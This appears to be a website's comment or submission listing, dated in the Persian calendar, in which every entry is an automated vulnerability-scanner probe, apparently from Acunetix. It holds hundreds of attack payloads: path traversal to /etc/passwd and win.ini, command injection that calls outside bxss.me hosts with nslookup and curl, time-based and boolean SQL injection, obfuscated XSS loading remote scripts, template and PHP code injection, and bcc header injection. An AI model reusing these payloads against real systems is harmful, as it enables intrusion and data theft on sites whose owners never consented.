  1402/04/28 20:26
  ../../../../../../../../../../../../../../etc/passwd
  1402/04/28 20:26
  `(nslookup -q=cname hitrqpaxqgvdc545c6.bxss.me||curl hitrqpaxqgvdc545c6.bxss.me)`
  1402/04/28 20:26
  555
  bcc:074625.447-260078.447.77009.19557.2@bxss.me
  1402/04/28 20:26
  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/28 20:26
  ;(nslookup -q=cname hitatvlrkhhqpb5568.bxss.me||curl hitatvlrkhhqpb5568.bxss.me)|(nslookup -q=cname hitatvlrkhhqpb5568.bxss.me||curl hitatvlrkhhqpb5568.bxss.me)&(nslookup -q=cname hitatvlrkhhqpb5568.bxss.me||curl hitatvlrkhhqpb5568.bxss.me)
  1402/04/28 20:26
  to@example.com>
  bcc:074625.447-260079.447.77009.19557.2@bxss.me
  1402/04/28 20:26
  file:///etc/passwd
  1402/04/28 20:26
  555
  1402/04/28 20:26
  555
  1402/04/28 20:26
  ../555
  1402/04/28 20:26
  555<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/28 20:26
  555
  1402/04/28 20:26
  ${9999704+9999037}
  1402/04/28 20:26
  555
  1402/04/28 20:26
  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
  1402/04/28 20:26
  555&n927288=v927073
  1402/04/28 20:26
  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
  1402/04/28 20:26
  12345'"\'\");|]*{
  <>%BF''💡
  1402/04/28 20:26
  Http://bxss.me/t/fit.txt
  1402/04/28 20:26
  555
  1402/04/28 20:26
  http://bxss.me/t/fit.txt?.jpg
  1402/04/28 20:26
  /etc/shells
  1402/04/28 20:26
  )
  1402/04/28 20:26
  !(()&&!|*|*|
  1402/04/28 20:26
  555
  1402/04/28 20:26
  c:/windows/win.ini
  1402/04/28 20:26
  ^(#$!@#$)(()))******
  1402/04/28 20:26
  bxss.me
  1402/04/28 20:26
  555
  1402/04/28 20:26
  555
  1402/04/28 20:26
  555
  1402/04/28 20:26
  '.gethostbyname(lc('hitqw'.'diifgmchc4ecc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(80).chr(97).chr(69).'
  1402/04/28 20:26
  '"()
  1402/04/28 20:26
  ".gethostbyname(lc("hitmx"."tjppqiiqe8dd0.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(72).chr(107).chr(67)."
  1402/04/28 20:26
  555'&&sleep(27*1000)*sgcukq&&'
  1402/04/28 20:26
  555"&&sleep(27*1000)*ygczab&&"
  1402/04/28 20:26
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/28 20:26
  555'||sleep(27*1000)*iqkvyb||'
  1402/04/28 20:26
  "+"A".concat(70-3).concat(22*4).concat(113).concat(89).concat(111).concat(79)+(require"socket"
  Socket.gethostbyname("hiten"+"jwfxzqrgca1f6.bxss.me.")[3].to_s)+"
  1402/04/28 20:26
  HttP://bxss.me/t/xss.html?%00
  1402/04/28 20:26
  ';print(md5(31337));$a='
  1402/04/28 20:26
  555"||sleep(27*1000)*wusedk||"
  1402/04/28 20:26
  '+'A'.concat(70-3).concat(22*4).concat(116).concat(79).concat(98).concat(66)+(require'socket'
  Socket.gethostbyname('hitlb'+'riqygrowf6e3c.bxss.me.')[3].to_s)+'
  1402/04/28 20:26
  ";print(md5(31337));$a="
  1402/04/28 20:26
  bxss.me/t/xss.html?%00
  1402/04/28 20:26
  ${@print(md5(31337))}
  1402/04/28 20:26
  ${@print(md5(31337))}\
  1402/04/28 20:26
  '.print(md5(31337)).'
  1402/04/28 20:26
  555
  1402/04/28 20:26
  -1 OR 2+757-757-1=0+0+0+1 --
  1402/04/28 20:26
  555
  1402/04/28 20:26
  555
  1402/04/28 20:26
  -1 OR 2+440-440-1=0+0+0+1
  1402/04/28 20:26
  555
  1402/04/28 20:26
  -1' OR 2+684-684-1=0+0+0+1 --
  1402/04/28 20:26
  -1' OR 2+805-805-1=0+0+0+1 or 'Q13GFxkm'='
  1402/04/28 20:26
  -1" OR 2+274-274-1=0+0+0+1 --
  1402/04/28 20:26
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/28 20:26
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/28 20:26
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87/.
  1402/04/28 20:26
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/28 20:26
  555
  1402/04/28 20:26
  555
  1402/04/28 20:26
  xfs.bxss.me
  1402/04/28 20:26
  555
  1402/04/28 20:26
  555
  1402/04/28 20:26
  '"
  1402/04/28 20:26
  <!--
  1402/04/28 20:26
  555'"()&%<zzz><ScRiPt >IGWr(9091)</ScRiPt>
  1402/04/28 20:26
  '"()&%<zzz><ScRiPt >IGWr(9691)</ScRiPt>
  1402/04/28 20:26
  5559966513
  1402/04/28 20:26
  bfg9802<s1﹥s2ʺs3ʹhjl9802
  1402/04/28 20:26
  bfgx2506%C0%BEz1%C0%BCz2a%90bcxhjl2506
  1402/04/28 20:26
  if(now()=sysdate(),sleep(15),0)
  1402/04/28 20:26
  <%={{={@{#{${dfb}}%>
  1402/04/28 20:26
  <th:t="${dfb}#foreach
  1402/04/28 20:26
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/28 20:26
  dfb{{98991*97996}}xca
  1402/04/28 20:26
  dfb[[${98991*97996}]]xca
  1402/04/28 20:26
  dfb__${98991*97996}__::.x
  1402/04/28 20:26
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/28 20:26
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/28 20:26
  555<ScRiPt >IGWr(9603)</ScRiPt>
  1402/04/28 20:26
  555<WCENTM>KBCXO[!+!]</WCENTM>
  1402/04/28 20:26
  555<script>IGWr(9766)</script>
  1402/04/28 20:26
  555<ScR<ScRiPt>IpT>IGWr(9962)</sCr<ScRiPt>IpT>
  1402/04/28 20:26
  555<ScRiPt
  >IGWr(9833)</ScRiPt>
  1402/04/28 20:26
  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9425></ScRiPt>
  1402/04/28 20:26
  555<ScRiPt
  >IGWr(9065)</ScRiPt>
  1402/04/28 20:26
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/28 20:26
  555<svg  

  %A0onload=IGWr(9656);>
  1402/04/28 20:26
  555<isindex type=image src=1 onerror=IGWr(9247)>
  1402/04/28 20:26
  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9266'>
  1402/04/28 20:26
  555<body onload=IGWr(9653)>
  1402/04/28 20:26
  555<img src=//xss.bxss.me/t/dot.gif onload=IGWr(9964)>
  1402/04/28 20:26
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/28 20:26
  555<img src=xyz OnErRor=IGWr(9014)>
  1402/04/28 20:26
  555<img/src=">" onerror=alert(9428)>
  1402/04/28 20:27
  %35%35%35%3C%53%63%52%69%50%74%20%3E%49%47%57%72%289025%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/28 20:27
  555\u003CScRiPt\IGWr(9270)\u003C/sCripT\u003E
  1402/04/28 20:27
  555&lt;ScRiPt&gt;IGWr(9847)&lt;/sCripT&gt;
  1402/04/28 20:27
  %F6<img zzz onmouseover=IGWr(93551) //%F6>
  1402/04/28 20:27
  -1; waitfor delay '0:0:15' --
  1402/04/28 20:27
  555<input autofocus onfocus=IGWr(9608)>
  1402/04/28 20:27
  <a HrEF=http://xss.bxss.me></a>
  1402/04/28 20:27
  <a HrEF=jaVaScRiPT:>
  1402/04/28 20:27
  555}body{zzz:Expre/**/SSion(IGWr(9176))}
  1402/04/28 20:27
  555Cyfpk
  <ScRiPt >IGWr(9320)</ScRiPt>
  1402/04/28 20:27
  -1); waitfor delay '0:0:15' --
  1402/04/28 20:27
  555<WRHK9P>LUFFF[!+!]</WRHK9P>
  1402/04/28 20:27
  555<ifRAme sRc=9255.com></IfRamE>
  1402/04/28 20:27
  555<aj3tLt2 x=9529>
  1402/04/28 20:27
  555<img sRc='http://attacker-9263/log.php?
  1402/04/28 20:27
  1 waitfor delay '0:0:15' --
  1402/04/28 20:27
  555<aYBflbt<
  1402/04/28 20:27
  555
  1402/04/28 20:27
  TvLOfn4q'; waitfor delay '0:0:15' --
  1402/04/28 20:27
  555
  1402/04/28 20:27
  -5 OR 262=(SELECT 262 FROM PG_SLEEP(15))--
  1402/04/28 20:27
  -5) OR 586=(SELECT 586 FROM PG_SLEEP(15))--
  1402/04/28 20:27
  -1)) OR 489=(SELECT 489 FROM PG_SLEEP(15))--
  1402/04/28 20:27
  6UjezieN' OR 541=(SELECT 541 FROM PG_SLEEP(15))--
  1402/04/28 20:27
  yjbXhrq3') OR 700=(SELECT 700 FROM PG_SLEEP(15))--
  1402/04/28 20:28
  zMtq5pbm')) OR 296=(SELECT 296 FROM PG_SLEEP(15))--
  1402/04/28 20:28
  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  1402/04/28 20:28
  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/28 20:28
  1'"
  1402/04/28 20:28
  1%C0%A7%C0%A2%2527%2522
  1402/04/28 20:28
  @@UWICo
  1402/04/28 20:28
  555
  1402/04/28 20:28
  555
  1402/04/28 20:30
  555
  1402/04/29 01:39
  555
  1402/04/29 01:39
  555
  1402/04/29 01:39
  555
  1402/04/29 01:40
  555'"()&%<zzz><ScRiPt >rMAv(9735)</ScRiPt>
  1402/04/29 01:40
  '"()&%<zzz><ScRiPt >rMAv(9516)</ScRiPt>
  1402/04/29 01:40
  5559155002
  1402/04/29 01:40
  bfg10092<s1﹥s2ʺs3ʹhjl10092
  1402/04/29 01:40
  bfgx5223%C0%BEz1%C0%BCz2a%90bcxhjl5223
  1402/04/29 01:41
  <%={{={@{#{${dfb}}%>
  1402/04/29 01:41
  <th:t="${dfb}#foreach
  1402/04/29 01:41
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 01:41
  dfb{{98991*97996}}xca
  1402/04/29 01:41
  dfb[[${98991*97996}]]xca
  1402/04/29 01:41
  dfb__${98991*97996}__::.x
  1402/04/29 01:41
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 01:41
  555<ScRiPt >rMAv(9718)</ScRiPt>
  1402/04/29 01:41
  555<WKZWVZ>QD5PQ[!+!]</WKZWVZ>
  1402/04/29 01:41
  555<script>rMAv(9243)</script>
  1402/04/29 01:41
  555<ScR<ScRiPt>IpT>rMAv(9200)</sCr<ScRiPt>IpT>
  1402/04/29 01:42
  555<ScRiPt
  >rMAv(9317)</ScRiPt>
  1402/04/29 01:42
  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9005></ScRiPt>
  1402/04/29 01:42
  555<ScRiPt
  >rMAv(9627)</ScRiPt>
  1402/04/29 01:42
  555<svg  

  %A0onload=rMAv(9345);>
  1402/04/29 01:42
  555<isindex type=image src=1 onerror=rMAv(9261)>
  1402/04/29 01:42
  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9436'>
  1402/04/29 01:42
  555<body onload=rMAv(9922)>
  1402/04/29 01:42
  555<img src=//xss.bxss.me/t/dot.gif onload=rMAv(9847)>
  1402/04/29 01:42
  555<img src=xyz OnErRor=rMAv(9450)>
  1402/04/29 01:43
  555<img/src=">" onerror=alert(9966)>
  1402/04/29 01:43
  %35%35%35%3C%53%63%52%69%50%74%20%3E%72%4D%41%76%289945%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 01:43
  555\u003CScRiPt\rMAv(9994)\u003C/sCripT\u003E
  1402/04/29 01:43
  555&lt;ScRiPt&gt;rMAv(9010)&lt;/sCripT&gt;
  1402/04/29 01:43
  %F6<img zzz onmouseover=rMAv(97181) //%F6>
  1402/04/29 01:43
  555<input autofocus onfocus=rMAv(9539)>
  1402/04/29 01:43
  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 01:44
  <a HrEF=jaVaScRiPT:>
  1402/04/29 01:44
  555}body{zzz:Expre/**/SSion(rMAv(9919))}
  1402/04/29 01:44
  555fVDSW
  <ScRiPt >rMAv(9696)</ScRiPt>
  1402/04/29 01:44
  555<WP3POC>RR5HV[!+!]</WP3POC>
  1402/04/29 01:44
  555<ifRAme sRc=9075.com></IfRamE>
  1402/04/29 01:44
  555<aJMiYew x=9597>
  1402/04/29 01:44
  555<img sRc='http://attacker-9201/log.php?
  1402/04/29 01:44
  555<arB44Hj<
  1402/04/29 09:27
  555'"()&%<zzz><ScRiPt >1KUj(9386)</ScRiPt>
  1402/04/29 09:27
  '"()&%<zzz><ScRiPt >1KUj(9854)</ScRiPt>
  1402/04/29 09:27
  5559013242
  1402/04/29 09:28
  bfg7651<s1﹥s2ʺs3ʹhjl7651
  1402/04/29 09:28
  bfgx7486%C0%BEz1%C0%BCz2a%90bcxhjl7486
  1402/04/29 09:28
  <%={{={@{#{${dfb}}%>
  1402/04/29 09:28
  <th:t="${dfb}#foreach
  1402/04/29 09:28
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 09:28
  dfb{{98991*97996}}xca
  1402/04/29 09:28
  dfb[[${98991*97996}]]xca
  1402/04/29 09:28
  dfb__${98991*97996}__::.x
  1402/04/29 09:28
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 09:28
  555<ScRiPt >1KUj(9055)</ScRiPt>
  1402/04/29 09:29
  555<WDVTIJ>9UJKR[!+!]</WDVTIJ>
  1402/04/29 09:29
  555<script>1KUj(9838)</script>
  1402/04/29 09:29
  555<ScR<ScRiPt>IpT>1KUj(9727)</sCr<ScRiPt>IpT>
  1402/04/29 09:29
  555<ScRiPt
  >1KUj(9233)</ScRiPt>
  1402/04/29 09:29
  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9208></ScRiPt>
  1402/04/29 09:29
  555<ScRiPt
  >1KUj(9574)</ScRiPt>
  1402/04/29 09:29
  555<svg  

  %A0onload=1KUj(9711);>
  1402/04/29 09:30
  555<isindex type=image src=1 onerror=1KUj(9221)>
  1402/04/29 09:30
  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9055'>
  1402/04/29 09:30
  555<body onload=1KUj(9960)>
  1402/04/29 09:30
  555<img src=//xss.bxss.me/t/dot.gif onload=1KUj(9145)>
  1402/04/29 09:30
  555<img src=xyz OnErRor=1KUj(9119)>
  1402/04/29 09:30
  555<img/src=">" onerror=alert(9911)>
  1402/04/29 09:30
  %35%35%35%3C%53%63%52%69%50%74%20%3E%31%4B%55%6A%289905%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 09:31
  555\u003CScRiPt\1KUj(9111)\u003C/sCripT\u003E
  1402/04/29 09:31
  555&lt;ScRiPt&gt;1KUj(9840)&lt;/sCripT&gt;
  1402/04/29 09:31
  %F6<img zzz onmouseover=1KUj(90371) //%F6>
  1402/04/29 09:31
  555<input autofocus onfocus=1KUj(9584)>
  1402/04/29 09:31
  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 09:31
  <a HrEF=jaVaScRiPT:>
  1402/04/29 09:31
  555}body{zzz:Expre/**/SSion(1KUj(9770))}
  1402/04/29 09:32
  555dPTIk
  <ScRiPt >1KUj(9464)</ScRiPt>
  1402/04/29 09:32
  555<WNFQHK>XKG91[!+!]</WNFQHK>
  1402/04/29 09:32
  555<ifRAme sRc=9636.com></IfRamE>
  1402/04/29 09:32
  555<aVAthEK x=9086>
  1402/04/29 09:32
  555<img sRc='http://attacker-9014/log.php?
  1402/04/29 09:32
  555<aInUXBT<
  1402/04/29 09:50
  555'"()&%<zzz><ScRiPt >aQDN(9085)</ScRiPt>
  1402/04/29 09:50
  '"()&%<zzz><ScRiPt >aQDN(9054)</ScRiPt>
  1402/04/29 09:51
  response.write(9946245*9043643)
  1402/04/29 09:51
  '+response.write(9946245*9043643)+'
  1402/04/29 09:51
  "+response.write(9946245*9043643)+"
  1402/04/29 09:51
  5559132867
  1402/04/29 09:51
  echo njytey$()\ nwlezp\nz^xyu||a #' &echo njytey$()\ nwlezp\nz^xyu||a #|" &echo njytey$()\ nwlezp\nz^xyu||a #
  1402/04/29 09:51
  &echo ssxsyp$()\ ekrceb\nz^xyu||a #' &echo ssxsyp$()\ ekrceb\nz^xyu||a #|" &echo ssxsyp$()\ ekrceb\nz^xyu||a #
  1402/04/29 09:51
  |echo naeefy$()\ awchgu\nz^xyu||a #' |echo naeefy$()\ awchgu\nz^xyu||a #|" |echo naeefy$()\ awchgu\nz^xyu||a #
  1402/04/29 09:51
  (nslookup -q=cname hitimunqcohbt0eb5f.bxss.me||curl hitimunqcohbt0eb5f.bxss.me))
  1402/04/29 09:51
  $(nslookup -q=cname hitsztnlmcaozed5a1.bxss.me||curl hitsztnlmcaozed5a1.bxss.me)
  1402/04/29 09:51
  &nslookup -q=cname hitftggtfhbqs4504a.bxss.me&'\"`0&nslookup -q=cname hitftggtfhbqs4504a.bxss.me&`'
  1402/04/29 09:51
  &(nslookup -q=cname hitvigcwikiwde4b8f.bxss.me||curl hitvigcwikiwde4b8f.bxss.me)&'\"`0&(nslookup -q=cname hitvigcwikiwde4b8f.bxss.me||curl hitvigcwikiwde4b8f.bxss.me)&`'
  1402/04/29 09:51
  |(nslookup -q=cname hittbewefxtou2d121.bxss.me||curl hittbewefxtou2d121.bxss.me)
  1402/04/29 09:51
  bfg9500<s1﹥s2ʺs3ʹhjl9500
  1402/04/29 09:51
  `(nslookup -q=cname hitlkgfghhzvme34c8.bxss.me||curl hitlkgfghhzvme34c8.bxss.me)`
  1402/04/29 09:51
  ;(nslookup -q=cname hittpdxmzrhrk8a421.bxss.me||curl hittpdxmzrhrk8a421.bxss.me)|(nslookup -q=cname hittpdxmzrhrk8a421.bxss.me||curl hittpdxmzrhrk8a421.bxss.me)&(nslookup -q=cname hittpdxmzrhrk8a421.bxss.me||curl hittpdxmzrhrk8a421.bxss.me)
  1402/04/29 09:51
  TwSKGgym
  1402/04/29 09:51
  bfgx2990%C0%BEz1%C0%BCz2a%90bcxhjl2990
  1402/04/29 09:51
  ../../../../../../../../../../../../../../etc/passwd
  1402/04/29 09:51
  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/29 09:51
  file:///etc/passwd
  1402/04/29 09:51
  <%={{={@{#{${dfb}}%>
  1402/04/29 09:51
  ../
  1402/04/29 09:51
  ./
  1402/04/29 09:51
  <th:t="${dfb}#foreach
  1402/04/29 09:51
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 09:51
  dfb{{98991*97996}}xca
  1402/04/29 09:51
  bcc:074625.447-448980.447.77009.19558.2@bxss.me
  1402/04/29 09:51
  to@example.com>
  bcc:074625.447-448981.447.77009.19558.2@bxss.me
  1402/04/29 09:51
  dfb[[${98991*97996}]]xca
  1402/04/29 09:51
  <esi:include src="http://bxss.me/rpb.png"/>
  1402/04/29 09:52
  ${9999394+10000474}
  1402/04/29 09:52
  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
  1402/04/29 09:52
  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
  1402/04/29 09:52
  dfb__${98991*97996}__::.x
  1402/04/29 09:52
  Http://bxss.me/t/fit.txt
  1402/04/29 09:52
  &n966901=v959394
  1402/04/29 09:52
  http://bxss.me/t/fit.txt?.jpg
  1402/04/29 09:52
  /etc/shells
  1402/04/29 09:52
  )
  1402/04/29 09:52
  c:/windows/win.ini
  1402/04/29 09:52
  bxss.me
  1402/04/29 09:52
  !(()&&!|*|*|
  1402/04/29 09:52
  ^(#$!@#$)(()))******
  1402/04/29 09:52
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 09:52
  '.gethostbyname(lc('hitvp'.'exrccgsr6b14d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(82).chr(120).chr(73).'
  1402/04/29 09:52
  ".gethostbyname(lc("hitck"."cjrwwhgde8aaf.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(75).chr(115).chr(69)."
  1402/04/29 09:52
  555<ScRiPt >aQDN(9657)</ScRiPt>
  1402/04/29 09:52
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/29 09:52
  ';print(md5(31337));$a='
  1402/04/29 09:52
  ";print(md5(31337));$a="
  1402/04/29 09:52
  ${@print(md5(31337))}
  1402/04/29 09:52
  ${@print(md5(31337))}\
  1402/04/29 09:52
  '.print(md5(31337)).'
  1402/04/29 09:52
  ctime
  sleep
  p0
  (I30
  tp1
  Rp2
  .
  1402/04/29 09:52
  HttP://bxss.me/t/xss.html?%00
  1402/04/29 09:52
  bxss.me/t/xss.html?%00
  1402/04/29 09:52
  '"()
  1402/04/29 09:52
  '&&sleep(27*1000)*idesyv&&'
  1402/04/29 09:52
  "&&sleep(27*1000)*rdhcbj&&"
  1402/04/29 09:52
  '||sleep(27*1000)*sxxkgd||'
  1402/04/29 09:52
  555<WNDCGP>GORKK[!+!]</WNDCGP>
  1402/04/29 09:52
  "||sleep(27*1000)*ldxmyo||"
  1402/04/29 09:52
  555<script>aQDN(9124)</script>
  1402/04/29 09:52
  "+"A".concat(70-3).concat(22*4).concat(114).concat(80).concat(115).concat(82)+(require"socket"
  Socket.gethostbyname("hitkd"+"mccxfavm3aa12.bxss.me.")[3].to_s)+"
  1402/04/29 09:52
  '+'A'.concat(70-3).concat(22*4).concat(115).concat(66).concat(119).concat(72)+(require'socket'
  Socket.gethostbyname('hitcs'+'alerrgdae0472.bxss.me.')[3].to_s)+'
  1402/04/29 09:52
  555<ScR<ScRiPt>IpT>aQDN(9192)</sCr<ScRiPt>IpT>
  1402/04/29 09:52
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/29 09:52
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/29 09:52
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/29 09:52
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87/.
  1402/04/29 09:52
  -1 OR 2+328-328-1=0+0+0+1 --
  1402/04/29 09:52
  -1 OR 3+328-328-1=0+0+0+1 --
  1402/04/29 09:52
  -1 OR 2+279-279-1=0+0+0+1
  1402/04/29 09:52
  -1 OR 3+279-279-1=0+0+0+1
  1402/04/29 09:52
  -1' OR 2+885-885-1=0+0+0+1 --
  1402/04/29 09:52
  xfs.bxss.me
  1402/04/29 09:52
  -1' OR 3+885-885-1=0+0+0+1 --
  1402/04/29 09:52
  -1' OR 2+141-141-1=0+0+0+1 or 'Cg2U0k8P'='
  1402/04/29 09:52
  -1' OR 3+141-141-1=0+0+0+1 or 'Cg2U0k8P'='
  1402/04/29 09:52
  555<ScRiPt
  >aQDN(9994)</ScRiPt>
  1402/04/29 09:52
  -1" OR 2+666-666-1=0+0+0+1 --
  1402/04/29 09:52
  -1" OR 3+666-666-1=0+0+0+1 --
  1402/04/29 09:52
  '"
  1402/04/29 09:52
  <!--
  1402/04/29 09:52
  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9740></ScRiPt>
  1402/04/29 09:52
  '"()&%<zzz><ScRiPt >raVy(9354)</ScRiPt>
  1402/04/29 09:52
  '"()&%<zzz><ScRiPt >raVy(9399)</ScRiPt>
  1402/04/29 09:52
  555<ScRiPt
  >aQDN(9047)</ScRiPt>
  1402/04/29 09:52
  9167505
  1402/04/29 09:52
  bfg9137<s1﹥s2ʺs3ʹhjl9137
  1402/04/29 09:52
  555<svg  

  %A0onload=aQDN(9165);>
  1402/04/29 09:53
  bfgx1903%C0%BEz1%C0%BCz2a%90bcxhjl1903
  1402/04/29 09:53
  <%={{={@{#{${dfb}}%>
  1402/04/29 09:53
  555<isindex type=image src=1 onerror=aQDN(9173)>
  1402/04/29 09:53
  <th:t="${dfb}#foreach
  1402/04/29 09:53
  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9890'>
  1402/04/29 09:53
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 09:53
  dfb{{98991*97996}}xca
  1402/04/29 09:53
  555<body onload=aQDN(9071)>
  1402/04/29 09:53
  dfb[[${98991*97996}]]xca
  1402/04/29 09:53
  dfb__${98991*97996}__::.x
  1402/04/29 09:53
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 09:53
  555<img src=//xss.bxss.me/t/dot.gif onload=aQDN(9766)>
  1402/04/29 09:53
  <ScRiPt >raVy(9829)</ScRiPt>
  1402/04/29 09:53
  <WNRNY0>UTXRK[!+!]</WNRNY0>
  1402/04/29 09:53
  555<img src=xyz OnErRor=aQDN(9204)>
  1402/04/29 09:53
  if(now()=sysdate(),sleep(15),0)
  1402/04/29 09:53
  <script>raVy(9655)</script>
  1402/04/29 09:53
  <ScR<ScRiPt>IpT>raVy(9782)</sCr<ScRiPt>IpT>
  1402/04/29 09:53
  <ScRiPt
  >raVy(9744)</ScRiPt>
  1402/04/29 09:53
  555<img/src=">" onerror=alert(9254)>
  1402/04/29 09:53
  <ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9783></ScRiPt>
  1402/04/29 09:53
  <ScRiPt
  >raVy(9811)</ScRiPt>
  1402/04/29 09:53
  %35%35%35%3C%53%63%52%69%50%74%20%3E%61%51%44%4E%289268%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 09:53
  <svg  

  %A0onload=raVy(9719);>
  1402/04/29 09:53
  <isindex type=image src=1 onerror=raVy(9228)>
  1402/04/29 09:53
  <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9908'>
  1402/04/29 09:53
  555\u003CScRiPt\aQDN(9484)\u003C/sCripT\u003E
  1402/04/29 09:53
  <body onload=raVy(9461)>
  1402/04/29 09:53
  <img src=//xss.bxss.me/t/dot.gif onload=raVy(9974)>
  1402/04/29 09:53
  555&lt;ScRiPt&gt;aQDN(9081)&lt;/sCripT&gt;
  1402/04/29 09:53
  <img src=xyz OnErRor=raVy(9020)>
  1402/04/29 09:53
  <img/src=">" onerror=alert(9751)>
  1402/04/29 09:53
  %0D%0A%3C%53%63%52%69%50%74%20%3E%72%61%56%79%289908%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 09:53
  %F6<img zzz onmouseover=aQDN(99081) //%F6>
  1402/04/29 09:53
  \u003CScRiPt\raVy(9673)\u003C/sCripT\u003E
  1402/04/29 09:53
  &lt;ScRiPt&gt;raVy(9641)&lt;/sCripT&gt;
